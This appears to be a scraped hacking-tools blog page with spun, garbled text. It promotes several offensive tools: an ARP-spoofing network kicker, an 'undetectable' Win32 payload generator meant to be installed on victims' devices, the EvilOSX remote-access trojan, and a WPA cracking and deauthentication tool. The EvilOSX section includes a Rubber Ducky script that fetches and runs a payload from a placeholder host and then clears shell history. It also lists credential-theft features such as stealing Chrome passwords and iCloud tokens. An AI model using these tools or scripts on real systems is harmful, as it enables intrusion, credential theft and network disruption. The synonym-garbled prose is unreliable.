// ----------------------------------------------------------------------------------------------//
RSS

Kickthemout: Boot Whatsoever Devices Off Lan Network Alongside Arp Spoof Attack

About KickThemOut


   KickThemOut is an tool to kicking devices out of your network as well as bask all the bandwidth for yourself. It allows you lot to select specific or all devices as well as ARP spoofs them off your local expanse network.
   Compatible alongside Python 3. Not compatible alongside Windows.

KickThemOut Installation
   You convey to install Nmap first:
    * On Debian as well as its distro: sudo apt install nmap
    * On Arch Linux as well as its distro: sudo pacman -S nmap

   After that, locomote into these commands:

KickThemOut Using menu

KickThemOut's demo

KickThemOut's developer:
 * Nikolaos Kamarinakis: Twitter@nikolaskama
 * David Schütz: Twitter@xdavidhu

Disclaimer: KickThemOut is provided every bit is nether the MIT Licence (as stated below). It is built for educational purposes only. If you lot direct to usage it otherwise, the developers volition non last held responsible. Please, produce non usage it alongside evil intent.

KickThemOut's License
   Copyright (c) 2017-18 past times Nikolaos Kamarinakis & David Schütz. Some rights reserved.
   KickThemOut is nether the price of the MIT License, next all clarifications stated inward the LICENSE file.
   For to a greater extent than information caput over to the official projection page. You tin also become ahead as well as electronic mail me anytime at nikolaskam@gmail.com or David at xdavid@protonmail.com.


  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Getwin: An Undetectable Win32 Payload Generator Together With Listener

About GetWin: GetWin is an undetectable Win32 payload generator in addition to listener. GetWin uses its ain Win32 payload in addition to uses NetCat in addition to SSH to command Victim.

GetWin Installation:
    You must install mingw-w64, PHP, SSH in addition to NetCat first:

  • For Arch Linux in addition to its distros:
    sudo pacman -S netcat php libssh2 openssh
    git clone https://aur.archlinux.org/mingw-w64-gcc.git
    cd mingw-w64-gcc && makepkg -Acs
  • For Debian in addition to its distros: sudo apt install netcat php ssh mingw-w64
   And then, operate inwards these commands:
Legal disclaimer:
   Usage of GetWin for attacking targets without prior usual consent is illegal. It's the halt user's responsibleness to obey all applicable local, state in addition to federal laws. Developers assume no liability in addition to are non responsible for whatsoever misuse or harm caused yesteryear this program.

How to create a payload amongst GetWin?
  1. First, operate inwards bash getwin.sh on its folder.
  2. Enter a port.
  3. Enter a advert for payload.
  4. Waiting...
  5. Your payload is saved on GetWin folder. Install it on victim's Windows device.
  6. And done, you completely command the victim
   You tin run across it inwards ii next screenshots.

GetWin's Screenshots


  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Githacktools: The Best Hacking Together With Pentesting Tools Installer On The World

About GitHackTools: GitHackTools is a the best Hacking together with PenTesting tools installer on the world. BruteDum tin operate alongside whatever Linux distros or Windows version if they back upwards Python 3.

Features of GitHackTools

  • Friend-ly Command Line Interface
  • A huge number bone hacking tools
  • Support Windows together with Linux, or orther OS. Better back upwards on Debian or Arch Linux
  • Move to orther category alongside 1 command
  • ...
GitHackTools installation on Linux
   You must install Python three together with brand first:
  • For Arch Linux together with its distros: sudo pacman -S python3 make
  • For Debian together with its distros: sudo apt install python3 make
   And then, opened upwards Terminal together with instruct inwards this command:
git clone https://github.com/GitHackTools/githacktools

GitHackTools installation on Windows
   Download together with run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
   Download together with run Git setup file from Git-scm.com together with pick out Use Git from Windows Command Propmt.

   After that, opened upwards PowerShell or Command Propmt together with instruct inwards these commands:
git clone https://github.com/GitHackTools/githacktools

   If y'all don't desire to install Git, y'all tin download githacktools-master.zip, extract together with purpose it.

GitHackTools screenshots
GitHackTools Home page on Parrot Security OS
GitHackTools Home page on Manjaro KDE
GitHackTools Home page on Windows 10
A2SV Installer on GitHackTools
Metasploit Installer on GitHackTools
Video demo:

Note: This tool may non install good alongside unopen to tools on unopen to Linux distros. Please say me most your problems on Issues. Thanks!

Contact to coder:
To-do list:
  • Add to a greater extent than tools.
  • Add to a greater extent than features together with commands.
  • More friend-ly.
  • Fix bugs if they are exist.
  • (Help me please)

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

One-Lin3r: A Light-Weight Framework Gives Y'all All The One-Liners For Pentesting, Privilege Escalation Purposes In Addition To More

About One-Lin3r
   One-Lin3r is unproblematic modular as well as light-weight framework gives you lot all the one-liners that you lot volition squall for piece penetration testing (Windows, Linux, macOS or fifty-fifty BSD systems) or hacking by as well as large alongside a lot of novel features to brand all of this fully automated (ex: you lot won't fifty-fifty squall for to re-create the one-liners).

One-Lin3r's Features
 * Influenza A virus subtype H5N1 lot of liners occupation alongside dissimilar purposes, currently are to a greater extent than than 155 liner.
 * The auto-complete characteristic that has been implemented inwards this framework is non the commons 1 you lot e'er see, hither are about highlights:

    * It's designed to cook typos inwards typed commands to the most similar dominance alongside but 1 tab click so search becomes search as well as thence on, fifty-fifty if you lot typed whatever random give-and-take similar to an dominance inwards this framework.
    * For you lot lazy-ones out in that location similar me, it tin strength out predict what liner you lot are trying to occupation yesteryear typing whatever share of it. For illustration if you lot typed use capabilities as well as clicked tab, it would live replaced alongside use linux/bash/list_all_capabilities as well as thence on. I tin strength out come across your smile, You are welcome!
    * If you lot typed whatever incorrect dominance thence pressed enter, the framework volition say you lot what is the nearest dominance to what you lot get got typed which could live the 1 you lot actually wanted.
    * Some less impressive things similar auto-complete for variables later on set command, auto-complete for liners later on use as well as info commands as well as lastly it converts all upper-case missive of the alphabet to lowercase automatically just-in-case you lot switched cases yesteryear fault piece typing.
    * Finally, you'll discovery your normal auto-completion things you lot were using before, similar commands auto-completion as well as persistent history, etc...

 * Automation:
    * You tin strength out automatically re-create the liner you lot desire to clipboard alongside dominance copy <liner> instead of using use <liner> as well as thence copying it which saves a lot of time, of course, if you lot merged it alongside the next features.
    * As you lot may noticed, you lot tin strength out occupation a resources file from command-line arguments earlier starting the framework itself or post commands directly.
    * Inside the framework you lot tin strength out occupation makerc dominance similar inwards Metasploit but this fourth dimension it alone saves the right of import commands.
    * There are history as well as resource commands thence you lot don't squall for to instruct out the framework.
    * You tin strength out execute equally many commands equally you lot desire at the same fourth dimension yesteryear splitting them alongside semi-colon.
    * Searching for whatever liner hither is thence easy, you lot tin strength out search for a liner yesteryear its name, share or fifty-fifty the liner writer name.

 * You tin strength out add together your ain liners yesteryear following these steps to create a liner equally a python file. After that you lot tin strength out brand a Pull asking alongside it thence it volition live added inwards the framework as well as credited alongside your squall of course.
 * The might to reload the database if you lot added whatever liner without restarting the framework.
 * You tin strength out add together whatever platform to the liners database but yesteryear making a folder inwards liners folder as well as creating a ".liner" file there.
 * And More...

Note: The liners database is non besides large but it volition instruct bigger alongside updates as well as contributions.
One-Lin3 Usage
   Command-line arguments
   Framework commands
Prerequisites earlier install One-Lin3r
 * Python 3.x.
 * Any OS, it should come about all but it's tested on Kali 2018+, Ubuntu 18+, Windows 10, Android alongside termux as well as MacOs 10.11

Installing as well as running
pip install one-lin3r
one-lin3r -h

Updating the framework or the database
pip install one-lin3r --upgrade
Note: As the liners are written equally python modules, it considered equally a share of the framework. So every novel liner added to the framework, its version volition instruct updated. 
One-Lin3r's screenshots

Contact to coder:
   Twitter: D4Vinci
   Telegram: D4Vinci_Ox

Donate to coder: If his move has been useful for you, experience costless to give cheers him yesteryear buying him a java or to a greater extent than :) Buy a coffee 

Disclaimer nigh One-Lin3r
   One-Lin3r is created to attention inwards penetration testing as well as it's non responsible for whatever misuse or illegal purposes.
   Copying a code from this tool or using it inwards about other tool is accepted equally you lot advert where you lot got it from 😄.
Pull requests are e'er welcomed :D
Credits as well as references:

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Cl0nemast3r: Detect As Well As Install Your Favorite Tools From Github Easier

About Cl0neMast3r
   Cl0neMast3r is a Python script that was coded to brand your life easier. Now you lot tin easily direct your favorite tools from GitHub as well as install them on your organization amongst i click. Even improve you lot tin ensure that you lot accept latest version of your favorite tools.

   All this as well as to a greater extent than you lot tin create amongst Clone master.
  
Cl0neMast3r was mainly made for penetration testers as well as põrnikas hunters 😉

Cl0neMast3r's Options:
   Cl0neMast3r provides you lot amongst a lot of options:
  • A: Add a tool from GitHub using URL
  • F: Find a tool on GitHub
  • R: Reinstall your tools
  • U: Update your tools
  • S: Display information virtually your favorite tools
  • D: Delete the listing of tools
  • M: Import your favorite tools
  • X: Export your tools to HTML
Cl0neMast3r Installation
Cl0neMast3r's Environment: 
   Cl0neMast3r doesn't back upwardly Windows correct straightaway :(
   Cl0neMast3r has been tested on:

  • MacOS High Sierra
  • Kali Linux
  • Linux Mint
Cl0neMast3r's screenshots:
About coder: Coded amongst honey as well as bugs yesteryear Abdulraheem Khaled ❤️

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Weebdns: Dns Enumeration Faster Than Other Normal Tools


About WeebDNS
   Written by: FuzzyRabbit
   WeebDNS is a DNS Enumeration Tool alongside Asynchronicity made alongside Python iii which makes it much faster than normal tools.

WeebDNS requirements: Python 3, Git, pip3

WeebDNS installation

Bugs as well as enhancements: For põrnikas reports or enhancements, delight opened upwards an issue here.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Waes: A Fast Website Enumeration Together With Scanning Tool For Hackers

About WAES: CPH:SEC WAES at a Glance
   Doing HTB or other CTFs enumeration against targets alongside HTTP(S) tin drib dead trivial. It tin acquire tedious to ever run the same script/tests on every box eg. Nmap, Nikto, Dirb together with and then on. H5N1 one-click on target alongside automatic reports coming solves the issue. Furthermore, alongside a script the enumeration procedure tin live on optimized spell saving fourth dimension for hacker. This is what CPH:SEC WAES or Website Auto Enumeration And Scanning is created for. WAES runs 4 steps of scanning against target (see to a greater extent than below) to optimize the fourth dimension pass scanning. While multi heart together with mortal or multi-threaded scanning could live on implemented it volition around sure as shooting acquire boxes to hang together with and then is undesirable.
  • From electrical flow version together with forrad WAES volition include an install script (see blow) equally projection moves from alpha to beta phase. 
  • WAES could convey been developed inwards Python merely skillful Bash projects are postulate to larn Bash. 
  • WAES is currently made for CTF boxes merely is moving towards online uses (see todo section)
WAES Installation together with Running
   Make certain directories are laid upwards correctly inwards supergobuster.sh. Should live on automatic alongside Kali Linux together with Parrot Security OS.
  • Standard directories for lists: SecLists/Discovery/Web-Content together with SecLists/Discovery/Web-Content/CMS 
  • Kali Linux together with Parrot Security OS wordlists directory list:
    /usr/share/wordlists/dirbuster/
WAES Enumeration Process together with Method: 
   The scanning together with enumeration procedure includes iv steps
  • Step 0 - Passive scan - (disabled inwards the electrical flow version):
       whatweb - aggressive mode

       OSIRA (same author) - looks for subdomains
     
  • Step 1 - Fast scan
       wafw00 - firewall detection

       nmap alongside http-enum
  • Step 2 - Scan - in-depth
       nmap - alongside NSE scripts: http-date,http-title,http-server-header,http-headers,http-enum,http-devframework,http-dombased-xss,http-stored-xss,http-xssed,http-cookie-flags,http-errors,http-grep,http-traceroute

       nmap alongside vulscan (CVSS 5.0+)

       nikto - alongside evasion H5N1 together with all CGI dirs

       uniscan - all tests except stress examination (qweds)
     
  • Step 3 - Fuzzing
    • supergobuster
      gobuster alongside multiple lists

      dirb alongside multiple lists
       
    • xss scan (to come)
.. against target spell dumping results files inwards report folder.

To-do list:
  • Implement domain equally input 
  • Add XSS scan 
  • Add SSL/TLS scanning 
  • Add domain scans 
  • Add golismero 
  • Add dirble 
  • Add progressbar 
  • Add CMS detection 
  • Add CMS specific scans

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Evilosx: A Gui Remote Direction Tool For Mac Osx


EvilOSX Features:
  • Emulate a lastly instance 
  • Simple extendable module system 
  • No bot dependencies (pure python) 
  • Undetected past times anti-virus (OpenSSL AES-256 encrypted payloads) 
  • Persistent 
  • GUI too CLI support 
  • Retrieve Chrome passwords 
  • Retrieve iCloud tokens too contacts 
  • Retrieve/monitor the clipboard 
  • Retrieve browser history (Chrome too Safari) 
  • Phish for iCloud passwords via iTunes 
  • iTunes (iOS) backup enumeration 
  • Record the microphone 
  • Take a desktop screenshot or motion-picture demo using the webcam
  •  Attempt to larn root via local privilege escalation
EvilOSX Installation too Running
   Open your Terminal too motion into these commands:
   Warning: Because payloads are created unique to the target organization (automatically past times the server), the server must live running when whatever bot connects for the kickoff time.

   For Advanced users: There's also a CLI for those who desire to role this over SSH:
python start.py --builder # Create a launcher to infect your target(s)
python start.py --cli --port 1337 # Start the CLI

Motivation
   This projection was created to live used alongside author's Rubber Ducky, here's the unproblematic script:

REM Download too execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals afterward x seconds
STRING covert -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; gyre -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER

  • It takes virtually 10 seconds to backdoor whatever unlocked Mac, which is...... nice.
  • Terminal is spelt that means intentionally, on about systems spotlight won't give away the lastly otherwise.
  • To bypass the keyboard setup assistant brand certain you lot alter the VID&PID which tin flame live institute here. Aluminum Keyboard (ISO) is in all probability the 1 you lot are looking for.
Versioning
   EvilOSX volition live maintained nether the Semantic Versioning guidelines equally much equally possible. Server too bot releases volition live numbered alongside the follow format:
<major>.<minor>.<patch>

   And constructed alongside the next guidelines:

  • Breaking backward compatibility (with older bots) bumps the major.
  • New additions without breaking backward compatibility bumps the minor.
  • Bug fixes too misc changes bump the patch.
   For to a greater extent than information on SemVer, delight view Semantic Versioning 2.0.0.

EvilOSX's Issues: Feel costless to submit whatever issues or characteristic requests here.
 

Contributing: For a unproblematic guide on how to exercise modules, click here.
 

Thanks for:
  • The awesome Empire project.
  • Shoutout to @patrickwardle for his awesome talks, cheque out Objective-See.
  • manwhoami for his projects: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts (now deleted... permit me know if you lot reappear).
  • The slowloris module is pretty much copied from PySlowLoris.
  • urwid too this code which saved me a lot of fourth dimension alongside the CLI.
  • Logo created past times motusora.
License: GNU General Public License v3.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Wifibroot: A Wifi Pentesting Together With Smashing Tool For Wpa/Wpa2

About WiFiBroot
   WiFiBroot is a WiFi-Penetest-Cracking tool for WPA/WPA2 (Handshake, PMKID, Offline Cracking, EAPOLS, Deauthentication Attack).
   WiFiBroot is built to provide clients all-in-one facility for non bad WiFi (WPA/WPA2) networks. It heavily depends on scapy, a well-featured bundle manipulation library inwards Python. Almost every procedure inside is theme somehow on scapy layers in addition to other functions except for operating the wireless interface on a dissimilar channel. That volition survive done via native linux ascendance iwconfig for which you lot perhaps involve sudo privileges. It currently provides 4 independent working modes to bargain amongst the target networks. Two of them are online non bad methods land the other runs inwards offline mode. The offline fashion is provided to crevice saved hashes from the showtime 2 modes. One is for deauthentication assault on wireless network in addition to tin also survive used every bit a jamming handler. It tin survive run on a diversity of linux platforms in addition to atleast requires WN727N from TP-Link to properly operate.

WiFiBroot Installation
   WiFiBroot heavily depends on scapy. So, you lot would involve scapy installed. Almost, every other library would probable survive installed on your system. Make certain the version you lot install for scapy should survive 2.4.0 or lower. Newer versions are probable to throw about unknown errors.
   The script is supposed to survive run nether sudo exactly it volition notwithstanding piece of job fifty-fifty if non run nether the root mode. The basic necessary arguments are:
sudo python wifibroot.py -i [interface] -d /path/to/dictionary -m [mode]

WiFiBroot Documentation:
   WiFiBroot uses modes to position which assault you lot desire to perform on your target. Currently, at that spot are 3 available modes. The usage of each fashion tin survive seen yesteryear supplying the --help/-h selection correct later the -m/--mode option. Here's a listing of available modes in addition to what they do:

   WiFiBroot's modes:
Syntax:
    $ python wifibroot.py [--mode [modes]] [--options]
    $ python wifibroot.py --mode 2 -i wlan1mon --verbose -d /path/to/list -w pmkid.txt

Modes:
    #     Description                                 Value
    01    Capture 4-way handshake in addition to crevice MIC code    1
    02    Captures in addition to Crack PMKID (PMKID Attack)       2
    03    Perform Manual non bad on available
          capture types. See --list-types               3
    04    Deauthentication. Disconnect 2 stations
          in addition to jam the traffic.                          4

Use -h, --help later -m, --mode to choke assistance on modes.
 


   Each fashion has a specific purpose in addition to has it's ain options:

      Handshake:
Mode:
   01      Capture 4-way handshake in addition to crevice MIC code    1

Options:
   Args               Description                      Required
   -h, --help         Show this assistance manual              NO
   -i, --interface    Monitor Interface to use           YES
   -v, --verbose      Turn off Verbose mode.             NO
   -t, --timeout      Time Delay betwixt 2 deauth
                      requests.                          NO
   -d, --dictionary   Dictionary for Cracking            YES
   -w, --write        Write Captured handshake to
                      a seperate file                    NO
       --deauth       Number of Deauthentication
                      frames to send                     NO

Filters:
   -e, --essid         ESSID of listening network
   -b, --bssid         BSSID of target network.
   -c, --channel       Channel interface should survive listening
                       on. Default: ALL

      PMKID Attack:
Mode:
   02      Captures in addition to Crack PMKID (PMKID Attack)       1

Options:
   Args               Description                      Required
   -h, --help         Show this assistance manual              NO
   -i, --interface    Monitor Interface to use           YES
   -v, --verbose      Turn off Verbose mode.             NO
   -d, --dictionary   Dictionary for Cracking            YES
   -w, --write        Write Captured handshake to
                      a seperate file                    NO

Filters:
   -e, --essid         ESSID of listening network
   -b, --bssid         BSSID of target network.
   -c, --channel       Channel interface should survive listening
                       on. Default: ALL
 

      Offline Cracking:
Mode:
   03    Perform Manaul non bad on available capture
         types. See --list-types                         3

Options:
   Args               Description                      Required
   -h, --help         Show this assistance manual              NO
       --list-types   List available non bad types      NO
       --type         Type of capture to crack           YES
   -v, --verbose      Turn off Verbose mode.             NO
   -d, --dictionary   Dictionary for Cracking            YES
   -e, --essid        ESSID of target network.
                      Only for HANDSHAKE Type            YES
   -r, --read         Captured file to crack             YES


      Deauthentication Attack (Stress Testing):
Mode:
    04   Deauthentication. Disconnect 2 stations
         in addition to jam the traffic.                            4

Options:
    Args              Description                      Required
    -h, --help        Show this assistance manual              NO
    -i, --interface   Monitor Mode Interface to use      YES
    -0, --count       Number of Deauthentication
                      frames to send. '0' specifies
                      unlimited frames                   YES
        --ap          Access Point MAC Address           NO
        --client      STA (Station) MAC Address          NO


WiFiBroot Examples
   To Capture 4-way handshake in addition to crevice MIC code:

python wifibroot.py --mode 1 -i wlan1mon --verbose -d dicts/list.txt -w output.cap

   To Capture in addition to Crack PMKID:
python wifibroot.py --mode 2 -i wlan1mon --verbose -d dicts/list.txt -w output.txt

   Offline Crack Handshake in addition to PMKID:
python wifibroot.py --mode 3 --type handshake --essid "TARGET ESSID" --verbose -d dicts/list.txt --read output.cap

python wifibroot.py --mode 3 --type pmkid --verbose -d dicts/list.txt --read output.txt

   Deauthentication assault inwards diverse form:
# Ultimate Deauthentication attack:
python wifibroot.py --mode 4 -i wlan1mon -00 --verbose
# Disconnect All Clients from Acess Point:

python wifibroot.py --mode 4 -i wlan1mon --ap [AP MAC] --verbose
# Disconnect a Specific Client:

python wifibroot.py --mode 4 -i wlan1mon --ap [AP MAC] --client [STA MAC] --verbose

Support:

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS